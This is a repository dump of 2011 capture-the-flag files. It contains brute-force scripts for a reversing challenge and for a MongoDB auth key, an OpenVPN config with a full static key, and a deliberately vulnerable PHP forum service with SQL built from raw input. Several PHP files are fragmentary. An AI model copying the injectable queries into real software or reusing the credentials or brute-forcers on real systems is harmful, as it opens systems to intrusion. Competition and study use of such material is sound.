https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.ructf/rev200/key.bin


--------------------------------------------------------------------------------
/2011.ructf/rev200/key.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.ructf/rev200/key.idb


--------------------------------------------------------------------------------
/2011.ructf/rev300/README:
--------------------------------------------------------------------------------
1 | program must output 94.35%
2 | found with tbl_shuffle.rb after some launches and 1-2 hours
3 | 


--------------------------------------------------------------------------------
/2011.ructf/rev300/brute.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/ruby
 2 | @chars = "23456789TJQKAhscd "
 3 | 
 4 | def check c
 5 |   system "echo #{c}44444 | wine pe1.exe"
 6 |   r = $?.exitstatus
 7 |   printf "[.] %10s : %d %s\n", c, r, "*"*r if r>6
 8 |   r
 9 | end
10 | 
11 | def loop s0=""
12 |   @chars.each_char do |c|
13 |     s = s0 + c
14 |     r = check s
15 |     if r >= s.size
16 |       print "\r#{s}: #{r}"
17 |       loop s
18 |     end
19 |   end
20 | end
21 | 
22 | loop
23 | 


--------------------------------------------------------------------------------
/2011.ructf/rev300/pe.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.ructf/rev300/pe.exe


--------------------------------------------------------------------------------
/2011.ructf/rev300/pe1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.ructf/rev300/pe1.exe


--------------------------------------------------------------------------------
/2011.ructf/rev300/shuffle.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/ruby
 2 | @chars = "23456789TJQKAhscd "
 3 | 
 4 | def check c
 5 |   system "echo #{c}44444 | wine pe1.exe"
 6 |   r = $?.exitstatus
 7 |   printf "[.] %10s : %d %s\n", c, r, "*"*r if r>6
 8 |   r
 9 | end
10 | 
11 | def loop s0=""
12 |   @chars.each_char do |c|
13 |     s = s0 + c
14 |     r = check s
15 |     if r >= s.size
16 |       print "\r#{s}: #{r}"
17 |       loop s
18 |     end
19 |   end
20 | end
21 | 
22 | ac = @chars.split('')
23 | while true do
24 |   s = ac.shuffle.join
25 |   r = check s
26 |   print "\r#{s}: #{r}" if r > 2
27 | end
28 | 


--------------------------------------------------------------------------------
/2011.rwth/__info/client.conf:
--------------------------------------------------------------------------------
 1 | client
 2 | dev tun
 3 | 
 4 | ca rwthctfca.pem
 5 | cert team77.cert
 6 | key team77.key
 7 | 
 8 | remote 137.226.161.5 1194
 9 | 
10 | tls-auth ta.key 1
11 | tls-remote vpn
12 | cipher none
13 | 
14 | persist-key
15 | persist-tun
16 | 
17 | verb 3
18 | mute 10
19 | nobind
20 | 
21 | 
22 | 


--------------------------------------------------------------------------------
/2011.rwth/__info/extract.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | boundaries = `grep boundary *.uncrypt`.strip.split("\n")
 3 | boundaries.each do |b|
 4 |   fname = b.split(':').first
 5 |   bound = b.split('"')[-1]
 6 | #  p [fname,bound]
 7 |   File.binread(fname).split(bound).each do |part|
 8 |     if part['MIME'] && part =~ /filename="(.*)"/
 9 |       fname = $1
10 |       p fname
11 |       data= part.split("\n\n",2)[1]
12 |       File.open(fname,'w'){ |f| f<< data.unpack('m*').first }
13 |     else
14 |       #p part
15 |     end
16 |   end
17 | end
18 | 


--------------------------------------------------------------------------------
/2011.rwth/__info/network.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/__info/network.png


--------------------------------------------------------------------------------
/2011.rwth/__info/secret.txt:
--------------------------------------------------------------------------------
1 | unoopehaihaebaig
2 | 


--------------------------------------------------------------------------------
/2011.rwth/__info/ta.key:
--------------------------------------------------------------------------------
 1 | #
 2 | # 2048 bit OpenVPN static key
 3 | #
 4 | -----BEGIN OpenVPN Static key V1-----
 5 | 52bf822947d57fd57f71e68bdc41bd91
 6 | 870d0ec6409e365bdcc32fe5946057e7
 7 | 986243a280906cdb01c9f1083b2bf687
 8 | 1092f027c850eb1259e9c9e68f9b4a7f
 9 | accf3428edfb83ad8d3cd7b14ce04844
10 | 1c72a07dc9d16b0aa6ff9764a91ee1fb
11 | 01ae3dec12b31054a2093264e490005f
12 | bb7a63d319575541e281eb689842d058
13 | 60da9d5b99f55efbddb30463d242a1a6
14 | 5b62d749100bf6af1ff1620e72f1f2fc
15 | f98ca977942dbf80ae2f559b87b00204
16 | c513e9c4d45f140442ecf59d613941bf
17 | e02ef24db77883a10dcdf4e1240c782c
18 | 094be6a1e0cb7cf9d7bb9d7a1fa433f6
19 | b2384900614eb745717a7d185316ba39
20 | 6a2e10c180f9d1aefff56af57305b3f7
21 | -----END OpenVPN Static key V1-----
22 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/README:
--------------------------------------------------------------------------------
1 | do not change/comment out parts of the service functions. functions like file
2 | uploads, account creation and message exchange are used to deposit flags on
3 | the system.
4 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/admin/addcats.php:
--------------------------------------------------------------------------------
 1 |  array('text','','*'), 
13 |       'gids' => array('text','','*'), 
14 |       'add' => array('submit','add category')
15 |    ));
16 | }
17 | 
18 | require_once('includes/footer.inc.php');
19 | ?>
20 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/admin/addgroups.php:
--------------------------------------------------------------------------------
 1 |  array('text','','*'), 
 9 | 	'add' => array('submit','add group')
10 | ));
11 | 
12 | require_once('includes/footer.inc.php');
13 | 
14 | ?>
15 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/admin/adminsql.php:
--------------------------------------------------------------------------------
 1 |  array('text','','*'), 
11 | 	'execute' => array('submit','execute')
12 | ));
13 | 
14 | require_once('includes/footer.inc.php');
15 | 
16 | ?>
17 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/admin/isadmin.php:
--------------------------------------------------------------------------------
 1 | 
25 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/admin/manage.php:
--------------------------------------------------------------------------------
 1 |  array('select','SELECT * FROM '.sqlite_escape_string($_POST['edit']).';'), 
10 |       'table' => array('hidden', $_POST['table']),
11 |       'change' => array('submit','manage selected')
12 |    ));
13 | } else {
14 |    form_dump(array(
15 |       'edit' => array('select','SELECT name FROM sqlite_master WHERE type="table";'), 
16 |       'change' => array('submit','manage selected')
17 |    ));
18 | }
19 | 
20 | require_once('includes/footer.inc.php');
21 | 
22 | ?>
23 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/dbs/psn.sqlite:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/dbs/psn.sqlite


--------------------------------------------------------------------------------
/2011.rwth/forum/fileoverview.php:
--------------------------------------------------------------------------------
 1 | ';
10 | foreach ($keys as $k) {
11 |    echo "\t".''.$k.''."\n";
12 | }
13 | echo ''."\n";
14 | foreach ($res as $r) {
15 |    echo ''."\n";
16 |    foreach ($r as $k=>$rt) {
17 |       echo "\t".'';
18 |       if ($k == 'file') {
19 |          echo '';
20 |       }
21 |       echo $rt;
22 |       if ($k == 'file') {
23 |          echo '';
24 |       }
25 |       echo ''."\n";
26 |    }
27 |    echo ''."\n";
28 | }
29 | echo '';
30 | echo '

'."\n";
31 | 
32 | echo 'Back' ;
33 | require_once('includes/footer.inc.php');
34 | ?>
35 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/includes/admin.inc.php:
--------------------------------------------------------------------------------
 1 |  0) {
 6 |    $pname = substr($turl, 0, $num);
 7 | } else {
 8 |    $pname = $turl;
 9 | }
10 | var_dump($pname);
11 | 
12 | $res = @db_fetch_array(@db_query("SELECT name FROM admin WHERE name='".$pname."'"), SQLITE_NUM);
13 | if (count($res) > 0) {
14 |    foreach ($res['0'] as $r) {
15 |       echo implode(';', $r)."
\n";
16 |    }
17 | }
18 | ?>
19 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/includes/cats.inc.php:
--------------------------------------------------------------------------------
 1 | 
43 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/includes/fileups.inc.php:
--------------------------------------------------------------------------------
 1 | 
 5 | 	
 6 | 	
 7 | 	

 8 | 		
 9 | 		
10 | 	
11 | 	
12 | 	

13 | 
42 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/includes/footer.inc.php:
--------------------------------------------------------------------------------
1 | 
6 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/includes/navi.inc.php:
--------------------------------------------------------------------------------
 1 | 
4 | 
5 | 
6 | 
7 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/tpls/templateh.inc.php:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 |  
 7 |  
 8 |  
 9 | 
10 | 
11 | 
12 | 
13 | 
14 | 

15 | 
18 | 

19 | 
20 | 

21 | 
22 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads.php:
--------------------------------------------------------------------------------
 1 | array('file','file'), 
 9 | 		'submit'=>array('submit', 'Save post')
10 | 	), 'enctype="multipart/form-data"');
11 | }
12 | 
13 | 
14 | if (!isset($_POST['submit']) || empty($_POST['submit'])) {
15 | 	echo 'Please select the file to upload:
';
16 | } else {
17 | 	if ($fname = file_save($_FILES['file'])) {
18 | 		echo 'file saved under '.$fname."
\n
\n";
19 | 	} else {
20 | 		echo 'failed to save file';
21 | 	}
22 |    echo '
'."\n";
23 | }
24 | 
25 | form_file();
26 | 
27 | echo '

'."\n";
28 | 
29 | require_once('includes/footer.inc.php');
30 | 
31 | ?>
32 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/022e2c7799d9e186f52842ece57.810d:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/022e2c7799d9e186f52842ece57.810d


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/05d67fa50cf9eb0989e225e9670.4f9f:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/05d67fa50cf9eb0989e225e9670.4f9f


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/08c526f3ce6d88d86cd0281530f.28c1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/08c526f3ce6d88d86cd0281530f.28c1


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/0e232c4c8865dd83cc67cb70348.d60a:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/0e232c4c8865dd83cc67cb70348.d60a


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/1abf598bcf5d34ea3bec14fd1a8.a35c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/1abf598bcf5d34ea3bec14fd1a8.a35c


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/1b7ad75af3266085d590f489384.141b:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/23584ba013b342a24f735feb085.003b:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/23584ba013b342a24f735feb085.003b


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/24da07f918f9496bc7b0de26b06.77d2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/24da07f918f9496bc7b0de26b06.77d2


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/255b7e516ac0d92e116be660668.66e4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/255b7e516ac0d92e116be660668.66e4


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/2d754da69b0a43bbb1d359ba48e.fe56:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/2d754da69b0a43bbb1d359ba48e.fe56


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/2fa514a2b6b479da4f0775a1633.d923:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/2fa514a2b6b479da4f0775a1633.d923


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/48812b7bffc12d4c659af01c510.f6ea:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/48812b7bffc12d4c659af01c510.f6ea


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/4a7e3008f6583a2177af4ce4873.eb4d:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/4a7e3008f6583a2177af4ce4873.eb4d


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/4df1eafd7b519e926a949687801.ae6c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/4df1eafd7b519e926a949687801.ae6c


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/53a510bfdebdef72fa2a8964c1b.cf55:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/53a510bfdebdef72fa2a8964c1b.cf55


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/552d7f814648b02b202d302c58f.a195:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/552d7f814648b02b202d302c58f.a195


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/58bf1228b8826585a2846072431.6efd:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/58bf1228b8826585a2846072431.6efd


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/5a3f17d41a12a65deef4d4267d1.ad2e:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/61e8df1cc760128225b9b261322.e16c:
--------------------------------------------------------------------------------
1 | Xft.dpi:    96
2 | Xft.hinting:    true
3 | Xft.antialias:  true
4 | Xft.hintstyle:  hintslight
5 | Xft.rgba:   rgb
6 | 


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/62e33618e5de62d51d7077f1460.de01:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/62e33618e5de62d51d7077f1460.de01


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/65b0d2a31fb5483cebea49df5ec.ba2a:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/65b0d2a31fb5483cebea49df5ec.ba2a


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/7b3f430783f125fd57e24b27856.3ae3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/7b3f430783f125fd57e24b27856.3ae3


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/7cb9e8da473df86462d310479bb.2633:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/7cb9e8da473df86462d310479bb.2633


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/7da0c41335cac8173cc706cf066.9b30:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/7da0c41335cac8173cc706cf066.9b30


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/7fb5d6c40692d56edcaf0d6da5f.a3c4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/7fb5d6c40692d56edcaf0d6da5f.a3c4


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/862692b6a9e032b804122f7c94b.f746:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/862692b6a9e032b804122f7c94b.f746


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/8b09a0f2dc09a15a4e42f52a361.8d2b:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/8b09a0f2dc09a15a4e42f52a361.8d2b


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/981a754bd1e47166eddf5ac3545.f290:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/981a754bd1e47166eddf5ac3545.f290


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/98cd49bbae0d5113a81e54cc506.cf44:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/98cd49bbae0d5113a81e54cc506.cf44


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/9fc3ca92308a9361480329ed0f0.684d:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/9fc3ca92308a9361480329ed0f0.684d


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/a0288bab76d51d5a4a5a5b13f74.3732:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/a0288bab76d51d5a4a5a5b13f74.3732


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/afcd92e7e3677726444dbbb0f3b.1497:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/afcd92e7e3677726444dbbb0f3b.1497


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/b248e88a8a8d1b02cb76644a76e.1ef7:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/b248e88a8a8d1b02cb76644a76e.1ef7


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/c2791de6325913519c8be000e2d.8363:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/c2791de6325913519c8be000e2d.8363


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/d5466209bc9cd807d8c30ba0d66.3d1a:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/d5466209bc9cd807d8c30ba0d66.3d1a


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/d6d51cfc57348f077d120c9828c.6928:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/d6d51cfc57348f077d120c9828c.6928


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/d84eb0c84aa96088276f6e9ad88.a95a:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/d84eb0c84aa96088276f6e9ad88.a95a


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/d9775f4b8e3f1b13c782d2ecf1a.a9b7:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/d9775f4b8e3f1b13c782d2ecf1a.a9b7


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/d9bd8e8c7df0bad163c161294a7.e650:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/d9bd8e8c7df0bad163c161294a7.e650


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/dcfb99634ebb2f2ec8e8ed03663.07e3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/dcfb99634ebb2f2ec8e8ed03663.07e3


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/e0a90af7a9140fb1675179271b1.a443:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/e0a90af7a9140fb1675179271b1.a443


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/f5a3c08c5bd245c1dcabe8eedda.f1b8:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/f5a3c08c5bd245c1dcabe8eedda.f1b8


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/fcdf0951d678b44dd3e142b9586.e34e:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/forum/uploads/fcdf0951d678b44dd3e142b9586.e34e


--------------------------------------------------------------------------------
/2011.rwth/forum/uploads/index.php:
--------------------------------------------------------------------------------
1 | 
4 | 


--------------------------------------------------------------------------------
/2011.rwth/mmd/mmd.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/mmd/mmd.db


--------------------------------------------------------------------------------
/2011.rwth/mongo_brute.rb:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env ruby
 2 | require 'mongo'
 3 | 
 4 | TARGET_AUTH_KEY = '6b079a01f6bb2ca4f158cbadc443fafa'
 5 | 
 6 | nonce = '28cf33f22c110199'
 7 | user  = 'nfs'
 8 | pass  = '1'
 9 | i = 0
10 | 
11 | while true do
12 |   pass = i.to_s
13 |   auth_key = Mongo::Support.auth_key(user, pass, nonce)
14 |   raise auth_key if auth_key == TARGET_AUTH_KEY
15 |   i += 1
16 |   print "#{i}\r" if i%100 == 0
17 | end
18 | 


--------------------------------------------------------------------------------
/2011.rwth/nfsv5/__mongodb_database.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/nfsv5/__mongodb_database.tgz


--------------------------------------------------------------------------------
/2011.rwth/nfsv5/nfsv5/__init__.py:
--------------------------------------------------------------------------------
 1 | 
 2 | import sys
 3 | import os
 4 | import traceback
 5 | 
 6 | from .pwrweb import pwrweb
 7 | from .msgblock import server as blockserver
 8 | from .dynamicnoncesystem import server as nsserver
 9 | from .data import nfsmongo
10 | from evnet import loop
11 | 
12 | IP = '0.0.0.0'
13 | WEBPORT = 13371
14 | CMBPORT = 13372
15 | DNSPORT = 13373
16 | 
17 | def main():
18 | 	data = nfsmongo()
19 | 	web = pwrweb(ip=IP, port=WEBPORT)
20 | 	web.store = data
21 | 	block = blockserver(ip=IP, port=CMBPORT)
22 | 	block.store = data
23 | 	ns = nsserver(ip=IP, port=DNSPORT)
24 | 	ns.store = data
25 | 	try:
26 | 		loop()
27 | 	except:
28 | 		pass
29 | 
30 | 	traceback.print_exc()
31 | 	return 0
32 | 
33 | 


--------------------------------------------------------------------------------
/2011.rwth/nfsv5/nfsv5/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/nfsv5/nfsv5/__init__.pyc


--------------------------------------------------------------------------------
/2011.rwth/nfsv5/nfsv5/data.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/nfsv5/nfsv5/data.pyc


--------------------------------------------------------------------------------
/2011.rwth/nfsv5/nfsv5/dynamicnoncesystem.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/nfsv5/nfsv5/dynamicnoncesystem.pyc


--------------------------------------------------------------------------------
/2011.rwth/nfsv5/nfsv5/include/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/nfsv5/nfsv5/include/__init__.py


--------------------------------------------------------------------------------
/2011.rwth/nfsv5/nfsv5/include/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/nfsv5/nfsv5/include/__init__.pyc


--------------------------------------------------------------------------------
/2011.rwth/nfsv5/nfsv5/include/fieldtypes.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/nfsv5/nfsv5/include/fieldtypes.pyc


--------------------------------------------------------------------------------
/2011.rwth/nfsv5/nfsv5/include/helpers.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/nfsv5/nfsv5/include/helpers.pyc


--------------------------------------------------------------------------------
/2011.rwth/nfsv5/nfsv5/include/ndrlib.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/nfsv5/nfsv5/include/ndrlib.pyc


--------------------------------------------------------------------------------
/2011.rwth/nfsv5/nfsv5/include/packet.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/nfsv5/nfsv5/include/packet.pyc


--------------------------------------------------------------------------------
/2011.rwth/nfsv5/nfsv5/include/smbfields.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/nfsv5/nfsv5/include/smbfields.pyc


--------------------------------------------------------------------------------
/2011.rwth/nfsv5/nfsv5/msgblock.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/nfsv5/nfsv5/msgblock.pyc


--------------------------------------------------------------------------------
/2011.rwth/nfsv5/nfsv5/pwrweb.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/nfsv5/nfsv5/pwrweb.pyc


--------------------------------------------------------------------------------
/2011.rwth/nfsv5/nfsv5/querymod.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/nfsv5/nfsv5/querymod.pyc


--------------------------------------------------------------------------------
/2011.rwth/nfsv5/nfsv5/rpcservices.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zed-0xff/ctf/45f027427b65c9b3b2be1e2a05b2cf86f6f9c446/2011.rwth/nfsv5/nfsv5/rpcservices.pyc


--------------------------------------------------------------------------------
/2011.rwth/nfsv5/start.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # -*- coding: utf8 -*-
 3 | 
 4 | import sys
 5 | 
 6 | from nfsv5 import main
 7 | 
 8 | if __name__ == '__main__':
 9 | 	sys.exit(main())
10 | 
11 | 


--------------------------------------------------------------------------------
/2011.rwth/office/infix.rb:
